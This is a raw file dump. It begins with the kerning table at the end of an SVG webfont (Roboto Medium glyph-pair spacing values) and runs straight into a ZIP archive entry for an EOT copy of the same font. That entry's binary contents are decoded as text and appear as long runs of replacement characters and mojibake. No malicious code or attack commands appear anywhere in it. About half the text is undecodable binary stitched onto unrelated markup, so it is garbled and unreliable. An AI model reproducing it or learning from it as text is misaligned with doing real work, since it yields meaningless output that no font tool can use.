<hkern u1="L" u2="w" k="76" />
<hkern u1="O" u2="&#xc6;" k="46" />
<hkern u1="P" u2="&#xc6;" k="235" />
<hkern u1="P" u2="t" k="-15" />
<hkern u1="Q" u2="&#x178;" k="51" />
<hkern u1="Q" u2="&#xdd;" k="51" />
<hkern u1="Q" u2="Y" k="51" />
<hkern u1="Q" u2="W" k="21" />
<hkern u1="Q" u2="V" k="30" />
<hkern u1="Q" u2="T" k="35" />
<hkern u1="R" u2="&#x178;" k="52" />
<hkern u1="R" u2="&#xdd;" k="52" />
<hkern u1="R" u2="Y" k="52" />
<hkern u1="R" u2="V" k="20" />
<hkern u1="R" u2="T" k="41" />
<hkern u1="T" u2="&#xf8;" k="103" />
<hkern u1="T" u2="&#xe6;" k="91" />
<hkern u1="T" u2="&#xc6;" k="192" />
<hkern u1="T" u2="&#xbb;" k="158" />
<hkern u1="T" u2="&#xab;" k="160" />
<hkern u1="T" u2="w" k="50" />
<hkern u1="T" u2="r" k="70" />
<hkern u1="V" u2="&#x7d;" k="-20" />
<hkern u1="V" u2="r" k="32" />
<hkern u1="V" u2="]" k="-18" />
<hkern u1="V" u2="&#x29;" k="-21" />
<hkern u1="W" u2="&#x7d;" k="-15" />
<hkern u1="W" u2="r" k="22" />
<hkern u1="W" u2="]" k="-13" />
<hkern u1="W" u2="&#x29;" k="-16" />
<hkern u1="Y" u2="&#x2022;" k="73" />
<hkern u1="Y" u2="&#xf8;" k="76" />
<hkern u1="Y" u2="&#xe6;" k="75" />
<hkern u1="Y" u2="&#xc6;" k="114" />
<hkern u1="Y" u2="&#xbb;" k="55" />
<hkern u1="Y" u2="&#xab;" k="99" />
<hkern u1="Y" u2="&#x7d;" k="-20" />
<hkern u1="Y" u2="t" k="27" />
<hkern u1="Y" u2="r" k="50" />
<hkern u1="Y" u2="f" k="30" />
<hkern u1="Y" u2="]" k="-19" />
<hkern u1="Y" u2="&#x2a;" k="67" />
<hkern u1="Y" u2="&#x29;" k="-21" />
<hkern u1="Y" u2="&#x26;" k="42" />
<hkern u1="Z" u2="w" k="29" />
<hkern u1="[" u2="&#xdc;" k="19" />
<hkern u1="[" u2="&#xdb;" k="19" />
<hkern u1="[" u2="&#xda;" k="19" />
<hkern u1="[" u2="&#xd9;" k="19" />
<hkern u1="[" u2="U" k="19" />
<hkern u1="[" u2="J" k="19" />
<hkern u1="f" u2="&#x201d;" k="-24" />
<hkern u1="f" u2="&#x201c;" k="-24" />
<hkern u1="f" u2="&#x2019;" k="-24" />
<hkern u1="f" u2="&#x2018;" k="-24" />
<hkern u1="f" u2="&#x7d;" k="-27" />
<hkern u1="f" u2="]" k="-40" />
<hkern u1="f" u2="&#x29;" k="-35" />
<hkern u1="f" u2="&#x27;" k="-24" />
<hkern u1="f" u2="&#x22;" k="-24" />
<hkern u1="k" u2="&#x153;" k="21" />
<hkern u1="k" u2="&#xeb;" k="21" />
<hkern u1="k" u2="&#xea;" k="21" />
<hkern u1="k" u2="&#xe9;" k="21" />
<hkern u1="k" u2="&#xe8;" k="21" />
<hkern u1="k" u2="&#xe7;" k="21" />
<hkern u1="k" u2="q" k="21" />
<hkern u1="k" u2="g" k="21" />
<hkern u1="k" u2="e" k="21" />
<hkern u1="k" u2="d" k="21" />
<hkern u1="k" u2="c" k="21" />
<hkern u1="r" u2="w" k="-21" />
<hkern u1="r" u2="t" k="-21" />
<hkern u1="r" u2="f" k="-19" />
<hkern u1="v" u2="f" k="-14" />
<hkern u1="w" u2="&#x2026;" k="99" />
<hkern u1="w" u2="&#x201e;" k="99" />
<hkern u1="w" u2="&#x201a;" k="99" />
<hkern u1="w" u2="&#x3a;" k="99" />
<hkern u1="w" u2="&#x2e;" k="99" />
<hkern u1="w" u2="&#x2c;" k="99" />
<hkern u1="y" u2="f" k="-14" />
<hkern u1="&#x7b;" u2="&#xdc;" k="21" />
<hkern u1="&#x7b;" u2="&#xdb;" k="21" />
<hkern u1="&#x7b;" u2="&#xda;" k="21" />
<hkern u1="&#x7b;" u2="&#xd9;" k="21" />
<hkern u1="&#x7b;" u2="U" k="21" />
<hkern u1="&#x7b;" u2="J" k="21" />
<hkern u1="&#xc0;" u2="w" k="35" />
<hkern u1="&#xc0;" u2="t" k="18" />
<hkern u1="&#xc0;" u2="&#x3f;" k="79" />
<hkern u1="&#xc1;" u2="w" k="35" />
<hkern u1="&#xc1;" u2="t" k="18" />
<hkern u1="&#xc1;" u2="&#x3f;" k="79" />
<hkern u1="&#xc2;" u2="w" k="35" />
<hkern u1="&#xc2;" u2="t" k="18" />
<hkern u1="&#xc2;" u2="&#x3f;" k="79" />
<hkern u1="&#xc3;" u2="w" k="35" />
<hkern u1="&#xc3;" u2="t" k="18" />
<hkern u1="&#xc3;" u2="&#x3f;" k="79" />
<hkern u1="&#xc4;" u2="w" k="35" />
<hkern u1="&#xc4;" u2="t" k="18" />
<hkern u1="&#xc4;" u2="&#x3f;" k="79" />
<hkern u1="&#xc5;" u2="w" k="35" />
<hkern u1="&#xc5;" u2="t" k="18" />
<hkern u1="&#xc5;" u2="&#x3f;" k="79" />
<hkern u1="&#xc7;" u2="&#x29;" k="28" />
<hkern u1="&#xc8;" u2="w" k="23" />
<hkern u1="&#xc9;" u2="w" k="23" />
<hkern u1="&#xca;" u2="w" k="23" />
<hkern u1="&#xcb;" u2="w" k="23" />
<hkern u1="&#xd0;" u2="&#xc6;" k="46" />
<hkern u1="&#xd2;" u2="&#xc6;" k="46" />
<hkern u1="&#xd3;" u2="&#xc6;" k="46" />
<hkern u1="&#xd4;" u2="&#xc6;" k="46" />
<hkern u1="&#xd5;" u2="&#xc6;" k="46" />
<hkern u1="&#xd6;" u2="&#xc6;" k="46" />
<hkern u1="&#xdd;" u2="&#x2022;" k="73" />
<hkern u1="&#xdd;" u2="&#xf8;" k="76" />
<hkern u1="&#xdd;" u2="&#xe6;" k="75" />
<hkern u1="&#xdd;" u2="&#xc6;" k="114" />
<hkern u1="&#xdd;" u2="&#xbb;" k="55" />
<hkern u1="&#xdd;" u2="&#xab;" k="99" />
<hkern u1="&#xdd;" u2="&#x7d;" k="-20" />
<hkern u1="&#xdd;" u2="t" k="27" />
<hkern u1="&#xdd;" u2="r" k="50" />
<hkern u1="&#xdd;" u2="f" k="30" />
<hkern u1="&#xdd;" u2="]" k="-19" />
<hkern u1="&#xdd;" u2="&#x2a;" k="67" />
<hkern u1="&#xdd;" u2="&#x29;" k="-21" />
<hkern u1="&#xdd;" u2="&#x26;" k="42" />
<hkern u1="&#xfd;" u2="f" k="-14" />
<hkern u1="&#xff;" u2="f" k="-14" />
<hkern u1="&#x178;" u2="&#x2022;" k="73" />
<hkern u1="&#x178;" u2="&#xf8;" k="76" />
<hkern u1="&#x178;" u2="&#xe6;" k="75" />
<hkern u1="&#x178;" u2="&#xc6;" k="114" />
<hkern u1="&#x178;" u2="&#xbb;" k="55" />
<hkern u1="&#x178;" u2="&#xab;" k="99" />
<hkern u1="&#x178;" u2="&#x7d;" k="-20" />
<hkern u1="&#x178;" u2="t" k="27" />
<hkern u1="&#x178;" u2="r" k="50" />
<hkern u1="&#x178;" u2="f" k="30" />
<hkern u1="&#x178;" u2="]" k="-19" />
<hkern u1="&#x178;" u2="&#x2a;" k="67" />
<hkern u1="&#x178;" u2="&#x29;" k="-21" />
<hkern u1="&#x178;" u2="&#x26;" k="42" />
<hkern u1="&#x2018;" u2="w" k="-11" />
<hkern u1="&#x2019;" u2="w" k="-11" />
<hkern u1="&#x201c;" u2="w" k="-11" />
<hkern u1="&#x201d;" u2="w" k="-11" />
<hkern g1="comma,period,colon,quotesinglbase,quotedblbase,ellipsis" 	g2="quotedbl,quotesingle,quoteleft,quoteright,quotedblleft,quotedblright" 	k="285" />
<hkern g1="B" 	g2="T" 	k="29" />
<hkern g1="B" 	g2="V" 	k="26" />
<hkern g1="B" 	g2="Y,Yacute,Ydieresis" 	k="90" />
<hkern g1="C,Ccedilla" 	g2="T" 	k="31" />
<hkern g1="D,O,Eth,Ograve,Oacute,Ocircumflex,Otilde,Odieresis" 	g2="A,Agrave,Aacute,Acircumflex,Atilde,Adieresis,Aring" 	k="22" />
<hkern g1="D,O,Eth,Ograve,Oacute,Ocircumflex,Otilde,Odieresis" 	g2="T" 	k="29" />
<hkern g1="D,O,Eth,Ograve,Oacute,Ocircumflex,Otilde,Odieresis" 	g2="V" 	k="23" />
<hkern g1="D,O,Eth,Ograve,Oacute,Ocircumflex,Otilde,Odieresis" 	g2="Y,Yacute,Ydieresis" 	k="46" />
<hkern g1="D,O,Eth,Ograve,Oacute,Ocircumflex,Otilde,Odieresis" 	g2="comma,period,colon,quotesinglbase,quotedblbase,ellipsis" 	k="106" />
<hkern g1="D,O,Eth,Ograve,Oacute,Ocircumflex,Otilde,Odieresis" 	g2="X" 	k="23" />
<hkern g1="D,O,Eth,Ograve,Oacute,Ocircumflex,Otilde,Odieresis" 	g2="Z" 	k="24" />
<hkern g1="E,Egrave,Eacute,Ecircumflex,Edieresis" 	g2="c,d,e,g,q,ccedilla,egrave,eacute,ecircumflex,edieresis,oe" 	k="16" />
<hkern g1="E,Egrave,Eacute,Ecircumflex,Edieresis" 	g2="o,ograve,oacute,ocircumflex,otilde,odieresis" 	k="20" />
<hkern g1="E,Egrave,Eacute,Ecircumflex,Edieresis" 	g2="T" 	k="-20" />
<hkern g1="E,Egrave,Eacute,Ecircumflex,Edieresis" 	g2="u,ugrave,uacute,ucircumflex,udieresis" 	k="18" />
<hkern g1="E,Egrave,Eacute,Ecircumflex,Edieresis" 	g2="v,y,yacute,ydieresis" 	k="28" />
<hkern g1="J,U,Ugrave,Uacute,Ucircumflex,Udieresis" 	g2="A,Agrave,Aacute,Acircumflex,Atilde,Adieresis,Aring" 	k="23" />
<hkern g1="K" 	g2="c,d,e,g,q,ccedilla,egrave,eacute,ecircumflex,edieresis,oe" 	k="28" />
<hkern g1="K" 	g2="o,ograve,oacute,ocircumflex,otilde,odieresis" 	k="29" />
<hkern g1="K" 	g2="u,ugrave,uacute,ucircumflex,udieresis" 	k="24" />
<hkern g1="K" 	g2="v,y,yacute,ydieresis" 	k="43" />
<hkern g1="K" 	g2="hyphen,uni00AD,endash,emdash" 	k="166" />
<hkern g1="K" 	g2="C,G,O,Q,Ccedilla,Ograve,Oacute,Ocircumflex,Otilde,Odieresis,Oslash,OE" 	k="43" />
<hkern g1="L" 	g2="quotedbl,quotesingle,quoteleft,quoteright,quotedblleft,quotedblright" 	k="276" />
<hkern g1="L" 	g2="A,Agrave,Aacute,Acircumflex,Atilde,Adieresis,Aring" 	k="-20" />
<hkern g1="L" 	g2="T" 	k="208" />
<hkern g1="L" 	g2="V" 	k="210" />
<hkern g1="L" 	g2="Y,Yacute,Ydieresis" 	k="273" />
<hkern g1="L" 	g2="u,ugrave,uacute,ucircumflex,udieresis" 	k="15" />
<hkern g1="L" 	g2="v,y,yacute,ydieresis" 	k="131" />
<hkern g1="L" 	g2="C,G,O,Q,Ccedilla,Ograve,Oacute,Ocircumflex,Otilde,Odieresis,Oslash,OE" 	k="41" />
<hkern g1="L" 	g2="U,Ugrave,Uacute,Ucircumflex,Udieresis" 	k="26" />
<hkern g1="L" 	g2="W" 	k="104" />
<hkern g1="P" 	g2="A,Agrave,Aacute,Acircumflex,Atilde,Adieresis,Aring" 	k="173" />
<hkern g1="P" 	g2="a,agrave,aacute,acircumflex,atilde,adieresis,aring" 	k="11" />
<hkern g1="P" 	g2="c,d,e,g,q,ccedilla,egrave,eacute,ecircumflex,edieresis,oe" 	k="14" />
<hkern g1="P" 	g2="o,ograve,oacute,ocircumflex,otilde,odieresis" 	k="14" />
<hkern g1="P" 	g2="comma,period,colon,quotesinglbase,quotedblbase,ellipsis" 	k="393" />
<hkern g1="P" 	g2="X" 	k="63" />
<hkern g1="P" 	g2="Z" 	k="37" />
<hkern g1="P" 	g2="v,y,yacute,ydieresis" 	k="-16" />
<hkern g1="T" 	g2="A,Agrave,Aacute,Acircumflex,Atilde,Adieresis,Aring" 	k="105" />
<hkern g1="T" 	g2="a,agrave,aacute,acircumflex,atilde,adieresis,aring" 	k="89" />
<hkern g1="T" 	g2="c,d,e,g,q,ccedilla,egrave,eacute,ecircumflex,edieresis,oe" 	k="96" />
<hkern g1="T" 	g2="m,n,p,ntilde" 	k="86" />
<hkern g1="T" 	g2="o,ograve,oacute,ocircumflex,otilde,odieresis" 	k="85" />
<hkern g1="T" 	g2="s" 	k="82" />
<hkern g1="T" 	g2="T" 	k="-17" />
<hkern g1="T" 	g2="V" 	k="-17" />
<hkern g1="T" 	g2="Y,Yacute,Ydieresis" 	k="-17" />
<hkern g1="T" 	g2="comma,period,colon,quotesinglbase,quotedblbase,ellipsis" 	k="232" />
<hkern g1="T" 	g2="u,ugrave,uacute,ucircumflex,udieresis" 	k="70" />
<hkern g1="T" 	g2="v,y,yacute,ydieresis" 	k="88" />
<hkern g1="T" 	g2="hyphen,uni00AD,endash,emdash" 	k="238" />
<hkern g1="T" 	g2="C,G,O,Q,Ccedilla,Ograve,Oacute,Ocircumflex,Otilde,Odieresis,Oslash,OE" 	k="30" />
<hkern g1="T" 	g2="W" 	k="-16" />
<hkern g1="T" 	g2="S" 	k="17" />
<hkern g1="T" 	g2="x" 	k="83" />
<hkern g1="T" 	g2="z" 	k="65" />
<hkern g1="V" 	g2="A,Agrave,Aacute,Acircumflex,Atilde,Adieresis,Aring" 	k="105" />
<hkern g1="V" 	g2="a,agrave,aacute,acircumflex,atilde,adieresis,aring" 	k="49" />
<hkern g1="V" 	g2="c,d,e,g,q,ccedilla,egrave,eacute,ecircumflex,edieresis,oe" 	k="47" />
<hkern g1="V" 	g2="o,ograve,oacute,ocircumflex,otilde,odieresis" 	k="49" />
<hkern g1="V" 	g2="comma,period,colon,quotesinglbase,quotedblbase,ellipsis" 	k="215" />
<hkern g1="V" 	g2="u,ugrave,uacute,ucircumflex,udieresis" 	k="30" />
<hkern g1="V" 	g2="v,y,yacute,ydieresis" 	k="11" />
<hkern g1="V" 	g2="hyphen,uni00AD,endash,emdash" 	k="118" />
<hkern g1="V" 	g2="C,G,O,Q,Ccedilla,Ograve,Oacute,Ocircumflex,Otilde,Odieresis,Oslash,OE" 	k="21" />
<hkern g1="W" 	g2="A,Agrave,Aacute,Acircumflex,Atilde,Adieresis,Aring" 	k="56" />
<hkern g1="W" 	g2="a,agrave,aacute,acircumflex,atilde,adieresis,aring" 	k="35" />
<hkern g1="W" 	g2="c,d,e,g,q,ccedilla,egrave,eacute,ecircumflex,edieresis,oe" 	k="33" />
<hkern g1="W" 	g2="o,ograve,oacute,ocircumflex,otilde,odieresis" 	k="33" />
<hkern g1="W" 	g2="T" 	k="-15" />
<hkern g1="W" 	g2="comma,period,colon,quotesinglbase,quotedblbase,ellipsis" 	k="155" />
<hkern g1="W" 	g2="u,ugrave,uacute,ucircumflex,udieresis" 	k="20" />
<hkern g1="W" 	g2="hyphen,uni00AD,endash,emdash" 	k="79" />
<hkern g1="X" 	g2="c,d,e,g,q,ccedilla,egrave,eacute,ecircumflex,edieresis,oe" 	k="28" />
<hkern g1="X" 	g2="o,ograve,oacute,ocircumflex,otilde,odieresis" 	k="26" />
<hkern g1="X" 	g2="V" 	k="-15" />
<hkern g1="X" 	g2="u,ugrave,uacute,ucircumflex,udieresis" 	k="22" />
<hkern g1="X" 	g2="v,y,yacute,ydieresis" 	k="40" />
<hkern g1="X" 	g2="hyphen,uni00AD,endash,emdash" 	k="170" />
<hkern g1="X" 	g2="C,G,O,Q,Ccedilla,Ograve,Oacute,Ocircumflex,Otilde,Odieresis,Oslash,OE" 	k="30" />
<hkern g1="Y,Yacute,Ydieresis" 	g2="A,Agrave,Aacute,Acircumflex,Atilde,Adieresis,Aring" 	k="154" />
<hkern g1="Y,Yacute,Ydieresis" 	g2="a,agrave,aacute,acircumflex,atilde,adieresis,aring" 	k="78" />
<hkern g1="Y,Yacute,Ydieresis" 	g2="c,d,e,g,q,ccedilla,egrave,eacute,ecircumflex,edieresis,oe" 	k="95" />
<hkern g1="Y,Yacute,Ydieresis" 	g2="m,n,p,ntilde" 	k="57" />
<hkern g1="Y,Yacute,Ydieresis" 	g2="o,ograve,oacute,ocircumflex,otilde,odieresis" 	k="102" />
<hkern g1="Y,Yacute,Ydieresis" 	g2="s" 	k="87" />
<hkern g1="Y,Yacute,Ydieresis" 	g2="T" 	k="-18" />
<hkern g1="Y,Yacute,Ydieresis" 	g2="V" 	k="-19" />
<hkern g1="Y,Yacute,Ydieresis" 	g2="Y,Yacute,Ydieresis" 	k="-19" />
<hkern g1="Y,Yacute,Ydieresis" 	g2="comma,period,colon,quotesinglbase,quotedblbase,ellipsis" 	k="238" />
<hkern g1="Y,Yacute,Ydieresis" 	g2="u,ugrave,uacute,ucircumflex,udieresis" 	k="56" />
<hkern g1="Y,Yacute,Ydieresis" 	g2="v,y,yacute,ydieresis" 	k="21" />
<hkern g1="Y,Yacute,Ydieresis" 	g2="hyphen,uni00AD,endash,emdash" 	k="142" />
<hkern g1="Y,Yacute,Ydieresis" 	g2="C,G,O,Q,Ccedilla,Ograve,Oacute,Ocircumflex,Otilde,Odieresis,Oslash,OE" 	k="31" />
<hkern g1="Y,Yacute,Ydieresis" 	g2="U,Ugrave,Uacute,Ucircumflex,Udieresis" 	k="79" />
<hkern g1="Y,Yacute,Ydieresis" 	g2="W" 	k="-18" />
<hkern g1="Y,Yacute,Ydieresis" 	g2="S" 	k="17" />
<hkern g1="Y,Yacute,Ydieresis" 	g2="x" 	k="28" />
<hkern g1="Y,Yacute,Ydieresis" 	g2="z" 	k="35" />
<hkern g1="Y,Yacute,Ydieresis" 	g2="J" 	k="125" />
<hkern g1="Z" 	g2="A,Agrave,Aacute,Acircumflex,Atilde,Adieresis,Aring" 	k="-14" />
<hkern g1="Z" 	g2="c,d,e,g,q,ccedilla,egrave,eacute,ecircumflex,edieresis,oe" 	k="22" />
<hkern g1="Z" 	g2="o,ograve,oacute,ocircumflex,otilde,odieresis" 	k="22" />
<hkern g1="Z" 	g2="u,ugrave,uacute,ucircumflex,udieresis" 	k="20" />
<hkern g1="Z" 	g2="v,y,yacute,ydieresis" 	k="29" />
<hkern g1="Z" 	g2="C,G,O,Q,Ccedilla,Ograve,Oacute,Ocircumflex,Otilde,Odieresis,Oslash,OE" 	k="28" />
<hkern g1="a,agrave,aacute,acircumflex,atilde,adieresis,aring" 	g2="quotedbl,quotesingle,quoteleft,quoteright,quotedblleft,quotedblright" 	k="32" />
<hkern g1="a,agrave,aacute,acircumflex,atilde,adieresis,aring" 	g2="v,y,yacute,ydieresis" 	k="16" />
<hkern g1="b,p,thorn" 	g2="quotedbl,quotesingle,quoteleft,quoteright,quotedblleft,quotedblright" 	k="38" />
<hkern g1="b,p,thorn" 	g2="v,y,yacute,ydieresis" 	k="11" />
<hkern g1="b,p,thorn" 	g2="x" 	k="16" />
<hkern g1="b,p,thorn" 	g2="z" 	k="16" />
<hkern g1="c,ccedilla" 	g2="quotedbl,quotesingle,quoteleft,quoteright,quotedblleft,quotedblright" 	k="25" />
<hkern g1="e,egrave,eacute,ecircumflex,edieresis" 	g2="quotedbl,quotesingle,quoteleft,quoteright,quotedblleft,quotedblright" 	k="25" />
<hkern g1="e,egrave,eacute,ecircumflex,edieresis" 	g2="v,y,yacute,ydieresis" 	k="14" />
<hkern g1="h,m,n,ntilde" 	g2="quotedbl,quotesingle,quoteleft,quoteright,quotedblleft,quotedblright" 	k="34" />
<hkern g1="o,ograve,oacute,ocircumflex,otilde,odieresis" 	g2="quotedbl,quotesingle,quoteleft,quoteright,quotedblleft,quotedblright" 	k="39" />
<hkern g1="o,ograve,oacute,ocircumflex,otilde,odieresis" 	g2="v,y,yacute,ydieresis" 	k="16" />
<hkern g1="o,ograve,oacute,ocircumflex,otilde,odieresis" 	g2="x" 	k="26" />
<hkern g1="o,ograve,oacute,ocircumflex,otilde,odieresis" 	g2="z" 	k="17" />
<hkern g1="r" 	g2="quotedbl,quotesingle,quoteleft,quoteright,quotedblleft,quotedblright" 	k="-17" />
<hkern g1="r" 	g2="comma,period,colon,quotesinglbase,quotedblbase,ellipsis" 	k="160" />
<hkern g1="r" 	g2="v,y,yacute,ydieresis" 	k="-22" />
<hkern g1="v,y,yacute,ydieresis" 	g2="a,agrave,aacute,acircumflex,atilde,adieresis,aring" 	k="16" />
<hkern g1="v,y,yacute,ydieresis" 	g2="c,d,e,g,q,ccedilla,egrave,eacute,ecircumflex,edieresis,oe" 	k="14" />
<hkern g1="v,y,yacute,ydieresis" 	g2="o,ograve,oacute,ocircumflex,otilde,odieresis" 	k="16" />
<hkern g1="v,y,yacute,ydieresis" 	g2="comma,period,colon,quotesinglbase,quotedblbase,ellipsis" 	k="154" />
<hkern g1="x" 	g2="c,d,e,g,q,ccedilla,egrave,eacute,ecircumflex,edieresis,oe" 	k="21" />
<hkern g1="x" 	g2="o,ograve,oacute,ocircumflex,otilde,odieresis" 	k="34" />
<hkern g1="z" 	g2="c,d,e,g,q,ccedilla,egrave,eacute,ecircumflex,edieresis,oe" 	k="17" />
<hkern g1="z" 	g2="o,ograve,oacute,ocircumflex,otilde,odieresis" 	k="17" />
</font>
</defs></svg> PK!��dtStSAit_sanctum/fonts/roboto_medium_macroman/Roboto-Medium-webfont.eotnu&1i�tS~R�LP��[ P � O���URoboto MediumRegular,Version 1.100141; 2013*Roboto Medium RegularBSGPt�2�2�,H���xZW�h[qJx"c�r,g,E�&�C��ľ����@���*0VF0i����
�^cX�#&�6����C>c|���w"�be|*�M0��fq4��D��r:UMyl�:��͉3�rŚ�B����jm�� �*i�6-�paid�	�ͥ}8�P .���M�_�'�W`�3m�,Y�B����\?��&1��1 M��'���ug����NإKO�`A��K��W�2��ss��C�
b�H�w��	}iJ7�@������+�ϙ��ԎNJ)�S��d)o�4U�I�5����ህZ	x3cL���|=���g��~�bA��5��p��mR݊���?&n�	� �	�R�:��p�IM�;l����2�f (�ܟV��A~{�X�C�!�<�@%���ųSa&���P�b·6ҚD�d-�*4X��Ƭ���0w��L�ˉq�1�@�V̋	#�	;k,(G(�֓�q��v�z�F)G�XLDHm�3�e�Ц�6妳�����43U�-/hg`��T�8l�@~#"qK���&U'4)�Ѕ�&��p��S�"�ÖzU���Z
ˀ�H�w�Vk���U^d��;���r�ۄ�G<Hh�T��)�%����ۥ���
:�@�(#����X� /���P	
���,�#��B�b��mD���ȬL
${t���p������� 
�*�v�MJI5ىRO�[e�'�W)Q�H*H�E���]��>���%f�P&s�	�t�o��DM�rlZ��0RG&f���TL��	��].t��������R;�ݸ�e
"q�(��qljZ�M9�51w�}�n+zw�{��Ef�~38 ��z��;|�jZ��fq�x%�ޥ���J5(ɹ��<w�p���C<�%��D���I!Z |�/��hD-*L�Y�b4��{���Y1u�h���"���v�4�������.�R�X
v�f�H�"�l%@Cj4���Qc(�3T&�>3�� ����G„;S�hިG�^q���bQ��o{�q�R�l�U�WaP���]��zY�[��-$�@���$�O)r�֤�4���W��S�|K��L0���ſ�:��͔�� U	^���
�Y�gЧ	��qA
'a%_��E����]�����R�`���4N��Bhwa����@)���doRUL���DF�ax̀'��b/:���as��-���%sGigŔR�!��R����r��g��]�� �iu�ИM�	���b*R
{���i.ZӾ*xc��6�U�"����̢������&������F����'e��f�x�<+��a\Z4m
�c=�=��(�^6?m�Ѩ��?�k��_u��O�����,Z~���������������+/�!o�'c�"���8{�4>�Z�%<6�I���.����M����C�{�����摭�|��#r|L[�Q��"{B��`t�҆�7S��ݧ�AEI1�7Tj�Ԡ�Թ��W��h..5k���.+RK�)�A�.h9j��Ȥ4Ί>n���< �"��ȣ���i���",�'�B���k?:�\�v��V��������3�:�����M��Em&ߚr� *����4�L���ݢ��R�$�J#������2�d�KmG��!^"���ZtS#|[{w���!��Z���Y���j|���������4��&_���Y�e�6���H�����0��>��p�<�z���
D�ܺ�y�4&�m|�`߻[�|��22��	��8�����f�X�TD��q�P�H)q��G)cS=o��o���m��e�x�
�=��2�H,c�K~Y��i��2���]R�@�vU�_න8w�
�딡��śM%��1�˫
F��1Ke.T�1�Gt�78��U�4M-$��KȀ�~d������i��葉SJP�����n4�;ӶD�f՘�ۄ�n\�N��~�fk�1"+H��&� SjvAͻ��#"��x�{v�����S6�k|j�3�ͫm[��M��7�lu��6�0���h�G:�&���i-�XKj�P>&I
��T�lb�j3�kJawU[�/�����Xo��?��Xڕ��p�9[�Ò�Sz��_���לܣu��m�s����sCg�G�${W
y(� �F�=���<.R�6_���t�a�M�&9�fc�\�U�f���h��-���F6����Sk�u�"]w*��1�����0��)�hkm%�ܧ��v�!*����>�������O�#G����H!DwQ~=�U��J7�ooq�$lY�C̝I� ����2�"�垤��{�C�h�>G#��J鈔��ۺ��%e�T���.�<1!�Mj?EU���H��R�����M�I�A�E,K�!�X@9�t>`ԀQшh��Tf�z!�89T��1I� 6�����\�#=�n����QɃ���&��#���q�p��zAu�S��bgj,�B�f>�{jK�n܉\HU1x�n�`Y�iy� �3դ��h]�0ʏI�I=�l;��N�VO3'j�w�",d�E,U6r�d�h�����

����<E�j&�L+��)���Z�Qڴ��P5�VK!�m��?n�V����nM��7g"L��Sv3��삡)GT�m-�utЂrP�ZP�|>�=oH#� i€�s��|���Sv)mǜ2��A�#�崴(�-��}�q-��1�-`�j��ٱ;��ӇG`����x=�)��~v���yZpk���E��xH,@���<�#R�Y]���ע0V�=�A��ԡ��ٴ�JVq���U���-}F��'���)�������F�dk�ǩ�~$Td��8 �.	]���"Ŀ��xH",��mm�-b�[��������xZ�>��N������E�d{�Ͱ�@�V��|���zQ!�l�P-�ɚ
�1>��aٴ.�KqW(KF�ޠ,���<��E��oє�-72IՀN���Av3CUl��.j	��D;:���,�^�ys4|��af'�W��h�
�M�0\���:t<��LS�*l!7�x�9z�+C���.�B���� O%`����0��C`X����}(�-����8PV�ash?��N�Ce��q��VaD�q$xK����}���fN��E�U�
63
�>��D��T��?b��T�4)����@T�1�&�ڪWỆۡ��DXVW�YL�'�zk"W�;�ȧQv��l1>��E"�Z'A?�����P/ĸxxF�}�GQ%%�N�4���Ց,~RI>Dp��G[�l�i�r
���}�-z����ٟk7U]�\�f�x�#GQB���8oh���@��E��Y�^��$OSho��d�Q9eU�	_�YK�D.1�_��D࿆�~�
�)ki�dS��쏇z��M����p>�����C�dZ�x��=}�� ڢ8y{��lmM�
�
P�97oؔJ��Fs�H�FI���	
�>.�1CW���
B愜==��h1��\띄�!�]��aH��}]��-``o
z�W<�\��G�)�ğ�lW Ap#�o$y�$�#�I�c�;G�Q8��Xi/�%J1�ԎØx�Q�������o�>�oŒ�^���w�K�F�>
	6J��a�qa-�dySMXB3
uc"h�ms�\���W[��K��%��f��XG�_mU��g%���_�Q��@���#J� ��#H&��O�T�C83��\7J��S�Pl��bM��c��:�m�} @Yܝs=����s�g8�_%zT�j� M�Ӓ�8a_����0��_�A$t
��@4	�4&jf�@qE�}|mܘ
g�v#97�OlL�� ��f	��X���P%�ʹ,��|�[���`~@n�F�Y�QD	+�y�p�\;��95e�%Ql�8!��uX�5��RF���,	0�0Œ0����pi��Ϥ�OB��W@!(�m�6�e����2D$(j<�8K �T8
�Q0��M
$w,���@y�qUP��ʠ���1
�/� �� `�"�"]���K�{�*Z%����Zk�QE��
4�F��^7R��������ZBBKW;��"0���f?&s�}"B��uP��ϔ��M�rŲXJ���E� �-�ޅ���M�7lͱs���Z5 v
_�┏����0���	o�1,�$�|���',q�ܑ7�0�<���1��F��փ�JY����+�XO��B����	#V�A���J�1�G�fa�T:��z�(�yPқSI�[�R>�����O��0Y���H��e"/�R�Ŕ5����:�M=l���P�XIHr`E#�o�A��b�S�y6d��'Q�����5!�.��
pd��"��N.f��,�����(�.i�G �B���bc&
O�x]��a��@�0�ȜGZ<�
����:��
|f4���ީ��{�����q�fZ��Y�	%�	d��շ�O�Iiw����w�����@'�v9��6�����H���̔�����X�.Dk�4�"��/⪅%�A�h���PF��FA:�����[��?t2A`�»��T�a��ڃu�T�1]��d/ơ(!���.�n��;R�q<�J�����r��a�B�C%& ���1��'CD3u����X�;v��Z���Y^�?��&�����>�и'�
��2��g�2ٰB}W�/��@E_O�P2�ڂUզ���������&�HR��)��,C
� ��?���)���j�.�@�|I�Gfy��׍@]�f�j#Ɂ��e��	?%��z�&�+�jl�>�g�'�`�k�z�`4�o,�S»����y,�&���8@�T1�AP)'M��6���T��K���n[:�l��oAA�KE�o1d	�5P�!�G���bW���i�)4�wb���G/�1V����rۿ

M�J[����^9aQ��V,���N�>��"*M��=�d.P�(�\�@E"6k��b	�p���F���&^?z�M
�S{�UH���B�=�P{b �{I��^�J7�}ޜ�z��Ĵռd]3k�CQ�4~bZ"��'������ڥ�LJ2[�Hz\���TZ��g/�XkT@���V:+���@�6�XQa�e�íx����~��w��Ń@�1��[98��*U�p��Jnv�,c�J�c��ڇ�7G��D��f�?�xu$���������(;�5��B����Xr�]/��}7
Q����P&X�>�#>�Y���8(Pxr�(\+��l"����!yy��G ��)leR@�8��U�g^e��ga@��� �*BTљ��&T#/��PTIs�9z`�3�`E���Aу�*h�Rr�29�J�0f��*ĵ��<�vYr$�a���x��i�yy=pӶ���i�۪v�zi�ǔ��X�0JO�,x��}Fb�!N����i�h�܋�h��֋�Y���˜��ۘ�מ��8��_���r��ic��l�p��k�+�[s�ِ�%?��F���)�x
p@d��L��6g��E/���eŚ��R����x,��:э�G��b��ת�b��7�*��bق���;B���oE�a���@n��U�i�AS� ���A��|���MQl��CM�)+uS@䴀Z=%�GB9�Y$�~��1~�_vB�]�8=��J<��$gǺ��չ"�)�K�7���xf��{[��3��G�Zj��`�A'��1ٝ��6r&
